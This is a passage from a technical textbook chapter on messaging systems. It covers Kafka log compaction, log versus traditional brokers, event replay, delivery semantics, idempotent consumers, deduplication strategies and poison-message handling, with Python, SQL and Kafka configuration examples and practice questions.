# State stream: keep the latest value per key forever.
kafka-topics.sh --create --topic user-profiles \
--config cleanup.policy=compact \
--config min.cleanable.dirty.ratio=0.5 \
--config delete.retention.ms=86400000 # how long tombstones survive, so
# offline consumers can still see
# the deletion when they return
# Both: compact, but drop anything older than 30 days regardless.
kafka-topics.sh --create --topic account-state \
--config cleanup.policy=compact,delete \
--config retention.ms=2592000000
Deletion in a compacted topic requires an explicit tombstone: a record with
the key and a null value. Compaction keeps the tombstone for
delete.retention.ms so that consumers replaying later observe the removal, and
then removes both it and the key's history. Publishing nothing does not delete a
key — absence is indistinguishable from "no update".
# Deleting a key from a compacted topic.
producer.send("user-profiles", key=b"u-42", value=None) # tombstone
# A consumer replaying sees: ... u-42=<data> ... u-42=None
# and must interpret None as "this key was deleted", not as a malformed record.
| Policy | Keeps | Bounded by | Use for |
|---|---|---|---|
delete (time/size) | Everything within the window | Time or bytes | Events, metrics, logs |
compact | Latest value per key | Number of distinct keys | Entity state, config, offsets |
compact,delete | Latest per key, within window | Both | State with a regulatory max age |
Two operational cautions. First, compaction is asynchronous and never instantaneous: a consumer reading the tail sees every version, including duplicates that will later be compacted away. Compaction guarantees eventual convergence, not a de-duplicated read. Second, a compacted topic's size is driven by key cardinality, so a high-cardinality key (a UUID per event) makes compaction useless — nothing is ever superseded, and the topic grows without bound.
Key Takeaways
- Time/size retention treats records as events to expire; compaction treats them as state and keeps the latest value per key.
- A compacted topic can rebuild full current state on replay, bounded by distinct key count rather than total history.
- Deletion requires an explicit null-valued tombstone, retained long enough for lagging consumers to observe it.
- Compaction is asynchronous — tail consumers still see superseded versions — and is useless for high-cardinality keys.
🧪 Practice
- Choose a policy and settings for: audit logs (7-year legal hold), current inventory levels, IoT telemetry, feature flags. Justify each.
- Explain why a compacted topic keyed by
event_idnever shrinks.- Interview: How would you rebuild a corrupted read model with zero downtime using a compacted topic? (Hint: build the new one alongside the old and switch only when it has caught up.)
Kafka vs. Traditional Brokers
The choice between a log-based system and a traditional message broker is not a matter of one being newer or faster. They optimize for different things, and picking the wrong one produces either unnecessary complexity or missing capability.
Traditional brokers (RabbitMQ, ActiveMQ, and the AMQP family) are built around flexible routing and per-message handling. The broker maintains per-message state, supports rich topologies through exchanges and bindings, can route on header values, can requeue a single message, and offers per-message TTLs, priorities, and delayed delivery. The unit of thought is the individual message.
Log brokers (Kafka, Pulsar, Redpanda) are built around high-throughput ordered retention. Routing is minimal — a partition key and nothing else — but throughput is enormous, history is retained, and any number of consumers can read independently. The unit of thought is the stream.
RABBITMQ: routing is the feature
producer -> [ exchange ] --binding: "order.*.eu"--> [ queue A ]
| --binding: "order.high.*"-> [ queue B ]
| --binding: header x-vip=1-> [ queue C ]
v
smart broker, per-message decisions, per-message state
KAFKA: retention and throughput are the feature
producer -> [ topic: partition by key ] -> retained 7 days
| | |
consumer-gp-A gp-B gp-C (independent offsets, replay)
dumb broker, smart consumers, no per-message state
| Dimension | Traditional broker (RabbitMQ) | Log broker (Kafka) |
|---|---|---|
| Throughput | Tens of thousands msg/s | Millions msg/s |
| After consumption | Message deleted | Retained until policy expires |
| Replay | No | Yes, reset the offset |
| Routing | Rich (topic, header, fanout) | Partition key only |
| Per-message TTL | Yes | No (retention is per topic) |
| Priority queues | Yes | No |
| Delayed delivery | Yes (plugin/TTL + DLX) | No (needs an external scheduler) |
| Selective ack | Yes, any message | No, offsets advance in order |
| Ordering | Per queue | Per partition |
| Consumer scaling limit | Unbounded | Partition count |
| Operational weight | Moderate | Higher (though improving) |
The decision usually reduces to four questions:
- Do you need history or replay? Only the log can give it. This alone decides many cases.
- Do you need per-message routing, priority, delay, or selective retry? Only the traditional broker does these natively; on Kafka each is a project.
- What is the throughput? Below roughly 50k msg/s, both work comfortably; above it, the log pulls decisively ahead.
- How many independent consumers will read the same data? Every additional consumer group is nearly free on a log and is another queue and another copy on a traditional broker.
# The capability that has no traditional-broker equivalent.
# Reprocessing three days of history through fixed code:
consumer = KafkaConsumer(group_id="billing-v2", enable_auto_commit=False)
partitions = [TopicPartition("order-events", p) for p in range(8)]
consumer.assign(partitions)
target_ms = int((time.time() - 3 * 86400) * 1000)
offsets = consumer.offsets_for_times({tp: target_ms for tp in partitions})
for tp, meta in offsets.items():
consumer.seek(tp, meta.offset) # rewind to a POINT IN TIME
# Now reprocess with the corrected logic. A queue-based system would have to
# ask every producer to resend history that nobody retained.
A pragmatic note: these are not mutually exclusive, and many mature systems run both — Kafka as the event backbone carrying state changes and analytics, and RabbitMQ or SQS for task queues that need priorities, delays, and per-message retry. Choosing "one messaging system for everything" is a common source of awkward workarounds in both directions.
Key Takeaways
- Traditional brokers optimize for routing flexibility and per-message control; log brokers optimize for throughput, retention, and replay.
- Replay, history, and cheap additional consumers are log-only capabilities.
- Priority, per-message TTL, delayed delivery, and selective ack are traditional-broker capabilities that require extra machinery on a log.
- Running both for different workloads is normal and usually cheaper than forcing one to do everything.
🧪 Practice
- Choose a broker for: password-reset emails, clickstream ingestion, video transcoding jobs, CDC from a database. Justify each in one sentence.
- Describe how you would implement delayed delivery on a log broker and what it costs.
- Interview: When is a log broker the wrong choice? (Hint: think about a workload where one slow message must not hold up the ones behind it.)
Event Replay
Event replay is reprocessing records that have already been consumed. It is the capability that most distinguishes a log from a queue, and it turns several otherwise-expensive operations into routine ones.
The reason it is so valuable is that it changes what a bug costs. In a queue-based system, a defect in a consumer means the affected data is gone — recovery requires reconstructing it from other sources, if that is even possible. With replay, the fix is: deploy corrected code, rewind the offset, let it run. The log holds the truth; derived state is disposable.
Four situations call for it:
| Situation | What you do |
|---|---|
| Bug fix | Rewind to before the bug and reprocess with new code |
| New consumer | Start at offset 0 and build state from full history |
| Rebuilding a store | Wipe a corrupted read model and regenerate it |
| Testing | Replay real production traffic into a staging system |
REPLAY WITH A PARALLEL CONSUMER GROUP (the safe pattern)
topic: [==================== history ====================>]
^ ^
| |
group "billing-v2" starts here group "billing-v1"
(rewound, reprocessing with the fix) (still live, still serving)
v2 catches up to v1's position, output is compared, then traffic is
switched. v1 is never interrupted, and a bad v2 is discarded harmlessly.
# Three ways to position a consumer for replay.
# 1. From the beginning: full history.
consumer.seek_to_beginning(*partitions)
# 2. From a specific offset, per partition.
consumer.seek(TopicPartition("order-events", 0), 1_500_000)
# 3. From a timestamp -- almost always what you actually want, because you
# know WHEN the bug was deployed, not which offset that corresponds to.
bug_deployed_ms = 1_724_500_000_000
offsets = consumer.offsets_for_times({tp: bug_deployed_ms for tp in partitions})
for tp, meta in offsets.items():
consumer.seek(tp, meta.offset if meta else 0)
Replay is powerful precisely because it re-executes real logic, which is also why it is dangerous. Four hazards must be handled deliberately:
Side effects re-fire. Replaying OrderPlaced through a consumer that sends
email will send every email again. Consumers intended to be replayable must
either be side-effect free or guard external calls with idempotency keys — and
during a replay, non-idempotent side effects should be disabled outright.
def handle(event, replaying=False):
update_read_model(event) # idempotent: safe to repeat
if not replaying:
send_email(event) # NOT idempotent: suppress on replay
charge_card(event, idempotency_key=event["event_id"]) # guarded: safe
Downstream load multiplies. Replaying three days of events in ten minutes compresses three days of write load into ten minutes. Rate-limit the replay consumer, or it becomes an outage of the database it is writing to.
Old events meet new code. A record written eighteen months ago has the schema of eighteen months ago. Replay is the operation that punishes schema carelessness most severely, which is why consumers should tolerate missing fields and unknown fields rather than assume the current shape.
Time semantics shift. Code that uses now() will compute different results
during replay than it did originally. Anything time-dependent must read the
event's own timestamp, not the wall clock.
The safest procedure is the parallel-group pattern shown above: run the replay as a new consumer group writing to a new destination, compare its output against the live one, and switch over only when it has caught up and matches. Never rewind a live consumer group in production as a first move — that is a change you cannot undo, made under the pressure of an incident.
Key Takeaways
- Replay makes derived state disposable and rebuildable, which changes a consumer bug from data loss into a redeploy.
- Position by timestamp rather than raw offset: you know when the bug shipped, not which offset that was.
- Guard side effects — suppress non-idempotent ones during replay and use idempotency keys for the rest.
- Rate-limit replays and run them as a parallel group writing to a new destination, rather than rewinding a live group.
🧪 Practice
- List every side effect in a typical order-processing consumer and classify each as replay-safe, guardable, or must-suppress.
- Replaying 30 days at full speed would produce 400x normal write load. Design the throttling.
- Interview: You must replay six months of events, but the schema changed three times. How do you proceed? (Hint: something has to know how to read the old shapes — either the consumer or a step before it.)
<a id="73-delivery-semantics"></a>
7.3 Delivery Semantics
Every messaging system must answer one question: if something fails between sending and processing, does the message get lost or repeated? There is no third option, and the whole of this subchapter follows from that fact.
At-Most-Once Delivery
At-most-once delivery guarantees that a message is processed zero or one times — never more. Duplicates are impossible; loss is possible.
The reason such a weak guarantee exists is that it is the cheapest and fastest one available. There are no retries, no acknowledgment round trips, no stored delivery state, and no dedup bookkeeping. The producer sends and moves on; the consumer acknowledges on receipt and processes afterwards. If anything fails in between, the message is simply gone.
You get at-most-once by acknowledging before doing the work — which is exactly what auto-acknowledge mode does, and why it is a bug in most systems and a deliberate choice in a few.
AT-MOST-ONCE: ack first, work second
broker ---- message ----> consumer
broker <--- ack ---------| message deleted NOW
|
v process()
X crash here -> the work never happened, and
nobody will ever know
# At-most-once, deliberately: the ack precedes the work.
channel.basic_consume(queue="metrics", on_message_callback=handle, auto_ack=True)
def handle(ch, method, properties, body):
# The broker already considers this delivered. A crash here loses it.
metrics_store.record(json.loads(body))
# Producer side: fire and forget, no confirmation waited for.
producer.send("metrics", value=payload) # note: no .get(), no callback,
# no acks -- send and continue
This is the right choice only when the cost of a duplicate exceeds the cost of a loss, or when losses are self-correcting. In practice that means:
| Workload | Why at-most-once fits |
|---|---|
| High-frequency metrics | The next sample arrives in a second; one gap is invisible |
| Live sensor telemetry | A stale reading is worse than a missing one |
| Cache-warming hints | A miss is handled by the normal cache-miss path |
| Debug/trace sampling | Already sampled; losing more changes nothing |
| Non-critical UI notifications | A duplicate notification is more annoying than a missed one |
The configuration that produces it spans producer and consumer, and both halves must agree:
# Producer: acks=0 means "do not wait for the broker to confirm anything".
producer = KafkaProducer(
acks=0, # no confirmation; a broker restart loses in-flight records
retries=0, # a retry could produce a duplicate -- forbid it
linger_ms=100, # batch aggressively; throughput is the whole point here
)
# Consumer: commit the offset BEFORE processing.
records = consumer.poll()
consumer.commit() # committed first -> a crash below skips these
for record in records:
process(record) # if this fails, the record is not retried
The honest framing is that at-most-once is a decision to lose data under
failure in exchange for throughput and simplicity. That is defensible for a
telemetry pipeline and indefensible for a payment. The failure mode to guard
against is choosing it by accident — auto_ack=True and acks=0 are both
defaults or one-word settings in various clients, and neither announces that it
has traded away durability.
Key Takeaways
- At-most-once means zero or one processing: no duplicates, possible loss.
- It is produced by acknowledging or committing before the work is done.
- It is the fastest and simplest option, appropriate only when a lost message is cheaper than a repeated one or is self-correcting.
- Both producer (
acks=0, no retries) and consumer (commit first) must be configured for it — and it is easy to select unintentionally.
🧪 Practice
- Give two workloads where at-most-once is correct and two where it would be a serious defect. Explain the deciding factor.
- Identify the specific line in a consumer that turns at-least-once into at-most-once, and describe the failure window it creates.
- Interview: When is a duplicate worse than a loss? (Hint: think about actions whose repetition is visible to a person or moves money.)
At-Least-Once Delivery
At-least-once delivery guarantees a message is processed one or more times — it is never lost, but it may repeat. This is the default of nearly every messaging system in production, because for most work, doing something twice is recoverable and never doing it is not.
The mechanism is the mirror image of at-most-once: acknowledge after the work succeeds, and retry anything unacknowledged. Since an acknowledgment can be lost in flight, or a consumer can crash in the window between finishing the work and sending the ack, the broker sometimes redelivers work that was already done. It has no way to distinguish "not done" from "done but unconfirmed".
THE UNAVOIDABLE DUPLICATE WINDOW
broker ---- message ----> consumer
|
v process() <- SUCCEEDS, side effects applied
|
| ack ------> X network drops the ack
X or consumer crashes right here
|
broker: no ack received -> redeliver -> the work runs a SECOND time
The broker cannot tell these apart:
(a) consumer died before doing the work -> must redeliver
(b) consumer died after doing the work -> must not redeliver
Since it cannot know, it chooses (a). That choice IS at-least-once.
# At-least-once on both sides.
producer = KafkaProducer(
acks="all", # wait for all in-sync replicas to persist
retries=10, # retry on failure -- this is where duplicates
# are born: a retried send whose first attempt
# actually succeeded produces two records
max_in_flight_requests_per_connection=5,
)
consumer = KafkaConsumer(group_id="billing", enable_auto_commit=False)
for record in consumer:
process(record) # work FIRST
consumer.commit() # commit only after success
# A crash between these two lines means `process` runs again on restart.
The essential consequence is that at-least-once shifts the burden to the consumer: since duplicates are guaranteed to occur eventually, the consumer must be built so that repeating an operation is harmless. That property is idempotency, and the next topic covers how to obtain it.
It helps to know where duplicates come from, because each source has a different frequency and a different mitigation:
| Source | Trigger | Frequency |
|---|---|---|
| Producer retry after a lost ack | Network blip during send | Common under load |
| Consumer crash before commit | Deploy, OOM, node failure | Every deploy |
| Visibility timeout expiring early | Job slower than the configured timeout | Constant if misconfigured |
| Rebalance mid-batch | Scaling, GC pause, max.poll.interval hit | Common |
| Deliberate redrive from a DLQ | Operator replays messages | Occasional |
# Estimating how often duplicates actually occur -- worth doing, because the
# answer determines how much you should invest in dedup infrastructure.
def duplicate_rate(msgs_per_day, deploys_per_day, consumers,
in_flight_per_consumer, crash_rate_per_day=0.02):
# Each deploy interrupts every consumer's in-flight batch.
from_deploys = deploys_per_day * consumers * in_flight_per_consumer
from_crashes = crash_rate_per_day * consumers * in_flight_per_consumer
total = from_deploys + from_crashes
return total, total / msgs_per_day
dupes, rate = duplicate_rate(msgs_per_day=40_000_000, deploys_per_day=6,
consumers=30, in_flight_per_consumer=100)
print(f"{dupes:.0f} duplicates/day ({rate:.6%} of messages)")
# 1860 duplicates/day (0.004650% of messages)
#
# A tiny percentage -- and 1,860 double-charged customers per day. The rate is
# irrelevant; the absolute number and the per-event cost are what matter.
That calculation is the point of the topic. "Duplicates are rare" is not a design position, because rare multiplied by high volume is a daily incident. At any meaningful scale, at-least-once without idempotent consumers is not a system that occasionally misbehaves — it is a system that misbehaves on schedule.
Key Takeaways
- At-least-once never loses messages but guarantees occasional duplicates.
- It arises from acknowledging after processing: the broker cannot distinguish "not done" from "done but unconfirmed".
- Duplicates come from producer retries, consumer crashes, expired visibility timeouts, and rebalances — deploys alone guarantee them.
- The guarantee is only usable if consumers are idempotent; compute the absolute daily duplicate count, not the percentage.
🧪 Practice
- For a system at 500 msg/s with 12 daily deploys across 20 consumers holding 50 in-flight each, estimate the daily duplicate count.
- For each duplicate source in the table, state the mitigation that reduces (not eliminates) it.
- Interview: A consumer commits its offset immediately after
poll()"to avoid duplicates". What has the team actually chosen? (Hint: name the guarantee, then name what they now lose.)
Exactly-Once Semantics
Exactly-once is the guarantee everyone wants: each message is processed once, with no loss and no duplication. It is also the most misunderstood topic in messaging, because in the general case exactly-once delivery is impossible, while exactly-once processing is achievable under specific conditions.
The impossibility is not an engineering limitation. It is the Two Generals Problem: a sender and receiver communicating over a lossy channel can never both be certain that a message was received. The sender that gets no acknowledgment cannot know whether the message or the acknowledgment was lost, and must choose between resending (risking a duplicate) and not resending (risking a loss). No protocol removes that choice, because any confirmation can itself be lost.
WHY DELIVERY CANNOT BE EXACTLY-ONCE
sender receiver
|--- message ----------->| received
|<--- ack --------X | ack lost in transit
| |
sender's dilemma: was the message delivered?
resend -> possible duplicate don't resend -> possible loss
Add an "ack of the ack" and the same problem simply moves one hop later.
What is achievable is exactly-once effect: at-least-once delivery combined with deduplication or idempotency, so that repeated delivery produces the same end state as a single delivery. The message may arrive five times; the effect occurs once. Every real "exactly-once" system works this way, and knowing that tells you what to check when a vendor claims it.
There are three mechanisms, in increasing order of scope:
1. Idempotent producer. Each producer gets an ID and each record a sequence number, so a broker receiving a duplicate from a retried send recognizes and discards it. This removes producer-side duplicates only.
2. Transactional writes. The offset commit and the output records are written in a single atomic transaction, so a consume-transform-produce pipeline either commits both or neither. This is what Kafka means by exactly-once semantics, and its scope is strictly Kafka-to-Kafka.
3. Idempotent consumer with a shared store. The consumer writes its business change and its processing marker in one transaction of the destination database. This is the only mechanism that extends exactly-once to systems outside the broker.
# Kafka transactional read-process-write: atomic across the pipeline.
producer = KafkaProducer(
transactional_id="enricher-1", # stable per instance; enables fencing so
enable_idempotence=True, # a zombie old instance cannot write
)
producer.init_transactions()
consumer = KafkaConsumer(
"raw-events", group_id="enricher",
isolation_level="read_committed", # never see records from an aborted txn
enable_auto_commit=False, # offsets are committed IN the transaction
)
for batch in consumer:
producer.begin_transaction()
try:
for record in batch:
producer.send("enriched-events", enrich(record))
# The critical line: offsets are part of the SAME transaction as the
# output records. Either both are visible or neither is.
producer.send_offsets_to_transaction(offsets_of(batch), "enricher")
producer.commit_transaction()
except Exception:
producer.abort_transaction() # output records never become visible
# The general case: exactly-once EFFECT via the destination database.
# This works with any broker, and extends the guarantee outside Kafka.
def handle(message):
with db.transaction(): # ONE transaction, TWO writes
already = db.execute(
"INSERT INTO processed_messages (message_id) VALUES (?) "
"ON CONFLICT DO NOTHING RETURNING 1", message.id)
if not already:
return # duplicate: the effect already
# happened, do nothing
db.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?",
message.amount, message.account_id)
# Atomicity is what makes this correct. If the marker and the business
# change could commit separately, a crash between them reintroduces
# either a duplicate or a lost update.
| Scope of guarantee | Mechanism | Works across systems? |
|---|---|---|
| No producer-side duplicates | Idempotent producer | Broker-internal |
| Atomic consume-transform-produce | Broker transactions | Same broker only |
| Exactly-once business effect | Idempotent consumer + shared txn | Yes |
| Exactly-once delivery | None — provably impossible | — |
The costs are real: transactions reduce throughput (commonly 20-50% on Kafka
depending on batch size), add latency because read_committed consumers wait for
transaction boundaries, and require careful handling of transaction timeouts.
The correct question is therefore not "can we have exactly-once?" but "which
specific effects must not be duplicated?" — and then applying idempotency there
rather than transactional machinery everywhere.
Key Takeaways
- Exactly-once delivery is impossible (Two Generals); exactly-once effect is achievable and is what all real systems provide.
- Idempotent producers remove send-retry duplicates; broker transactions make consume-transform-produce atomic within one broker.
- Only an idempotent consumer writing its marker and its business change in one destination transaction extends the guarantee to external systems.
- Transactions cost throughput and latency — apply them to the effects that genuinely require them, not to the whole pipeline.
🧪 Practice
- Explain in two sentences why an "ack of the ack" does not solve the Two Generals Problem.
- A pipeline reads Kafka, writes to Postgres, and calls a payment API. Which parts can be exactly-once, and how do you handle the part that cannot?
- Interview: A vendor advertises exactly-once delivery. What do you ask? (Hint: find the boundary of the claim — between which two components, and what happens at the edge of that boundary?)
Idempotent Consumers
An operation is idempotent when performing it multiple times has the same effect as performing it once. Since at-least-once delivery guarantees eventual duplicates, idempotency is what converts an unavoidable delivery weakness into a non-issue — it is the practical answer to exactly-once.
The key realization is that idempotency is a property of the operation, not of the messaging system. Many operations are naturally idempotent and need no machinery at all, and recognizing them saves a great deal of work.
# Naturally idempotent -- absolute assignment.
db.execute("UPDATE users SET email = ? WHERE id = ?", email, uid)
cache.set(key, value)
s3.put_object(Bucket=b, Key=k, Body=data)
db.execute("INSERT INTO x (id, ...) VALUES (?, ...) ON CONFLICT DO NOTHING", id)
# NOT idempotent -- relative modification or external side effect.
db.execute("UPDATE accounts SET balance = balance - 50 WHERE id = ?", uid)
db.execute("INSERT INTO orders (...) VALUES (...)") # a second row appears
send_email(user) # a second email arrives
queue.publish(downstream_event) # fans out twice
counter.increment()
The pattern is clear: setting a value to an absolute state is idempotent; modifying relative to the current state is not. Where you can express an operation as "make the world look like this" instead of "change the world by this much", you get idempotency for free.
When you cannot, there are three general techniques.
1. Deduplication by message identity. Record which message IDs have been processed and skip the ones you have seen. This is the most general approach and is covered in detail in the next topic.
2. Conditional updates with a version or state guard. Make the write itself refuse to apply twice, by encoding the precondition into the statement.
-- The transition is only valid from one specific prior state, so a
-- redelivery affects zero rows instead of shipping the order twice.
UPDATE orders
SET status = 'shipped', shipped_at = NOW()
WHERE id = :order_id
AND status = 'paid'; -- guard: already-shipped rows do not match
-- Version-based (optimistic concurrency): a stale or repeated event no-ops.
UPDATE inventory
SET quantity = :qty, version = :version
WHERE sku = :sku
AND version < :version; -- older or equal versions are ignored
3. Natural keys and upserts. Give the derived record a deterministic identity computed from the event, so a duplicate collides with itself.
# The row's primary key is derived from the event, not generated per insert.
payment_id = f"{order_id}:{attempt_no}" # deterministic, not a random UUID
db.execute("""
INSERT INTO payments (id, order_id, amount_cents, status)
VALUES (?, ?, ?, 'captured')
ON CONFLICT (id) DO NOTHING -- the duplicate simply vanishes
""", payment_id, order_id, amount_cents)
For side effects you do not own — a payment gateway, an email provider — the mechanism is an idempotency key passed to the external service, which then deduplicates on its side and returns the original result.
# The external call is made safe by the key, not by our retry logic.
stripe.PaymentIntent.create(
amount=amount_cents, currency="usd", customer=customer_id,
idempotency_key=f"order-{order_id}-capture", # deterministic per intent:
) # NOT a fresh uuid4() per
# Retrying with the same key returns the ORIGINAL result rather than charging
# again. Generating a new key per attempt would defeat the entire mechanism.
Two subtleties are worth stating explicitly. First, idempotency has a time scope: most external services honour idempotency keys for a limited window (commonly 24 hours), so a redrive from a DLQ two days later may not be deduplicated. Second, a handler with several steps is only idempotent if every step is — one non-idempotent write among five idempotent ones makes the whole handler unsafe, which is why the correct design usually wraps the marker and the effects in a single transaction.
Key Takeaways
- Idempotency is a property of the operation; absolute assignment is idempotent, relative modification is not.
- Prefer natural techniques — upserts on deterministic keys, state-guarded updates, version comparisons — over external dedup infrastructure.
- Use idempotency keys for third-party side effects, and derive the key from the event so retries reuse it.
- A handler is idempotent only if every step is; check the whole path, and note that external dedup windows expire.
🧪 Practice
- Rewrite these to be idempotent:
balance = balance - 50,INSERT INTO audit_log,send_sms(user),counter.increment().- Write the state-guarded SQL for an order lifecycle (
created -> paid -> shipped -> delivered) where each transition is safe to replay.- Interview: A handler updates a row, publishes an event, and sends an email. How do you make it idempotent? (Hint: the three steps have three different answers, and one of them may need to move out of the handler.)
Deduplication Strategies
When an operation cannot be made naturally idempotent, you deduplicate explicitly: remember which messages have been processed and skip repeats. The engineering problem is that "remember everything forever" is not viable at volume, so every strategy is a trade between accuracy, memory, and the window over which duplicates can be caught.
The first decision is what identity to deduplicate on. A producer-assigned message ID is the usual choice, but it only catches redelivery of the same message — not the case where a producer's own retry created two records with two IDs describing the same event. For that you need a content-derived key: a deterministic hash of the business fields that define the event's identity.
import hashlib
# Producer-assigned: catches broker redelivery.
message_id = str(uuid.uuid4())
# Content-derived: also catches a producer that sent the same event twice.
def business_key(event):
material = f"{event['order_id']}:{event['type']}:{event['sequence']}"
return hashlib.sha256(material.encode()).hexdigest()
# Note what is EXCLUDED: timestamps, hostnames, retry counters. Anything that
# varies between two sends of the "same" event must not enter the key.
The four practical strategies:
| Strategy | Memory | Accuracy | Window |
|---|---|---|---|
| Database unique key | Grows with messages | Exact | Unbounded |
| Redis SET with TTL | Bounded by TTL | Exact within the TTL | Minutes-hours |
| Bloom filter | Tiny and fixed | No false negatives, some false positives | Configurable |
| Broker-native dedup | Managed by the broker | Exact within a window | Fixed (e.g. 5 min) |
# Strategy 1: the destination database is the dedup store. Strongest option,
# because the marker and the business change commit atomically.
def handle(message):
with db.transaction():
try:
db.execute(
"INSERT INTO processed (message_id, processed_at) VALUES (?, ?)",
message.id, now())
except UniqueViolation:
return "duplicate" # atomic: the effect below is skipped
apply_business_change(message) # same transaction as the marker
# Bound the table's growth -- otherwise it becomes the largest table you own.
# DELETE FROM processed WHERE processed_at < NOW() - INTERVAL '7 days';
# Strategy 2: Redis SET NX with a TTL. Fast, bounded, but NOT atomic with the
# business change -- there is a window where the marker exists and the work
# did not happen.
def handle(message):
# NX = only set if absent; EX = expire. One round trip, atomic in Redis.
if not redis.set(f"dedup:{message.id}", "1", nx=True, ex=86400):
return "duplicate"
try:
apply_business_change(message)
except Exception:
redis.delete(f"dedup:{message.id}") # release the claim so a retry
raise # can proceed -- otherwise a
# transient failure permanently
# suppresses the message
# Strategy 3: Bloom filter -- constant memory, probabilistic.
# 100M messages at 0.1% false-positive rate needs ~180 MB, versus tens of GB
# for an exact set. The trade: a false positive DISCARDS a real message.
from pybloom_live import ScalableBloomFilter
seen = ScalableBloomFilter(initial_capacity=10_000_000, error_rate=0.001)
def handle(message):
if message.id in seen:
return "probably duplicate" # 0.1% chance this is WRONG and we just
# dropped a legitimate message
seen.add(message.id)
apply_business_change(message)
# Acceptable for analytics and metrics. Never for payments: silent data loss
# at a known rate is still silent data loss.
The most important design parameter is the deduplication window — how far back you can detect a repeat. It must be at least as long as the maximum realistic gap between two deliveries of the same message, which is set by your retry policy, your DLQ retention, and your redrive practice.
def dedup_window(max_retries, base_delay_s, dlq_retention_days, redrive_lag_h):
retry_span = sum(base_delay_s * 2 ** i for i in range(max_retries))
# The binding constraint is almost always the DLQ: a message redriven
# after five days must still be recognized as already processed.
return max(retry_span, dlq_retention_days * 86400 + redrive_lag_h * 3600)
print(dedup_window(5, 30, 14, 4) / 86400) # 14.17 days
# A 24-hour Redis TTL against a 14-day DLQ is a dedup system that quietly
# fails exactly when it is needed -- during recovery from a real incident.
Key Takeaways
- Deduplicate on a content-derived key when producer retries can create distinct IDs for the same event.
- A unique constraint in the destination database is the strongest strategy because the marker commits atomically with the effect.
- Redis with TTL is fast and bounded but not atomic with the business change — release the claim on failure.
- Bloom filters trade a known rate of silent message loss for constant memory; size the dedup window from DLQ retention, not from the retry policy alone.
🧪 Practice
- Compute the memory for exact dedup of 500M message IDs over 30 days, and compare it with a Bloom filter at 0.01% false positives.
- Explain the failure that occurs if the Redis strategy omits the
redis.deleteon the exception path.- Interview: Your dedup window is 24 hours and your DLQ retains 14 days. What goes wrong, and when? (Hint: the failure only appears during a redrive, which is to say during an incident.)
Poison Message Handling
A poison message is one that fails every time it is processed. It is not a transient failure that will succeed on retry — it is structurally unprocessable: malformed JSON, a schema the consumer cannot parse, a reference to a deleted entity, or a payload that triggers a bug.
The danger is disproportionate to the single message. Under at-least-once delivery with retries, a poison message is an infinite loop that consumes capacity forever. In an ordered system it is worse: a poison message at the head of a Kafka partition halts that partition entirely, and every message behind it — possibly millions — waits indefinitely.
HEAD-OF-LINE BLOCKING IN AN ORDERED PARTITION
partition 2: [ BAD ][ m1 ][ m2 ][ m3 ] ... [ m900000 ]
^
consumer retries forever; the offset never advances
Lag on this partition grows without bound while the other partitions are
perfectly healthy -- which is why per-partition lag, not topic-average lag,
is the metric that catches this.
The first requirement is to classify the failure correctly, because the right response is opposite for the two categories:
| Category | Examples | Correct response |
|---|---|---|
| Transient | Timeout, 503, deadlock, connection reset, 429 | Retry with backoff |
| Permanent | Parse error, schema violation, 400, 404, business-rule rejection | Fail immediately to the DLQ |
Retrying a permanent failure wastes capacity and delays the inevitable. Dead-lettering a transient failure discards recoverable work during an outage — the worst possible moment, because the DLQ then fills with thousands of messages that would have succeeded five minutes later.
class Permanent(Exception): pass
class Transient(Exception): pass
def classify(exc):
# Anything the payload itself causes is permanent: a retry re-runs the
# same bytes through the same code and gets the same result.
if isinstance(exc, (json.JSONDecodeError, SchemaError, ValidationError)):
return Permanent(str(exc))
if isinstance(exc, HTTPError):
if exc.status in (400, 404, 409, 422):
return Permanent(f"http {exc.status}")
if exc.status in (429, 502, 503, 504):
return Transient(f"http {exc.status}")
if isinstance(exc, (TimeoutError, ConnectionError, DeadlockDetected)):
return Transient(str(exc))
return Transient(str(exc)) # default to transient: a wrong retry is
# recoverable, a wrong discard is not
For ordered streams, where dead-lettering the message is a decision to break ordering, the standard resolution is to skip forward and record the failure, accepting an ordering gap rather than an indefinite stall:
def consume_ordered(record):
try:
process(record)
consumer.commit()
except Exception as exc:
err = classify(exc)
if isinstance(err, Permanent) or attempts(record) >= MAX_ATTEMPTS:
# Explicit choice: preserve LIVENESS over ORDERING. The gap is
# recorded so it can be repaired later from the DLQ.
dlq.send(record, reason=str(err), partition=record.partition,
offset=record.offset)
consumer.commit() # advance past the poison message
alert("poison_message", partition=record.partition,
offset=record.offset, key=record.key)
else:
raise # transient: do not advance; retry
Three practices keep poison handling from becoming a silent data-loss channel.
Fail fast on parse errors. Validate the schema before any expensive work, so an unprocessable message costs microseconds rather than a full timeout cycle.
Cap retries per message, not just globally. A message that has failed five times with a transient error is behaving like a permanent failure regardless of what the exception class says.
Alert with the address, not the count. A DLQ alert that says "47 messages" is useless at three in the morning. Include the partition, offset, key, error, and consumer version so the on-call engineer can reproduce it immediately.
The deeper point is that poison messages are usually a schema or contract problem presenting as an operational one. A recurring class of poison message means a producer is emitting something the consumer never agreed to accept, and the durable fix is schema validation at the producer with a registry enforcing compatibility — not a larger DLQ.
Key Takeaways
- A poison message fails deterministically and, without bounded retries, loops forever or blocks an ordered partition entirely.
- Classify failures: retry transient ones with backoff, dead-letter permanent ones immediately, and default to transient when unsure.
- In ordered streams, skipping and recording the gap preserves liveness at the cost of ordering — make that trade explicitly.
- Alert with partition, offset, key, and error; recurring poison messages indicate a producer-side schema problem, not a DLQ-sizing problem.
🧪 Practice
- Classify as transient or permanent: connection reset, 401, 429, foreign-key violation, out-of-memory,
NoSuchBucket.- Write the consumer logic that stalls a partition for transient failures but skips past permanent ones, and explain why the two paths differ.
- Interview: A poison message blocks a Kafka partition with 2 million messages behind it. Walk through your response. (Hint: stop the bleeding first, then diagnose — and decide what you are willing to give up to advance the offset.)
<a id="74-background-work-and-scheduling"></a>
7.4 Background Work and Scheduling
Messaging moves work off the request path; this subchapter is about executing that work reliably — how workers consume it, how failures are retried, and how work that must happen at a particular time gets scheduled across a fleet where no single machine is trustworthy.
Worker Pools and Task Queues
A task queue is a message queue whose payloads describe jobs to execute, and a worker pool is the set of processes that execute them. The distinction from generic messaging is one of intent, and it shows up in the surrounding machinery: task queues care about retries, timeouts, results, progress, and scheduling in a way that raw messaging does not.
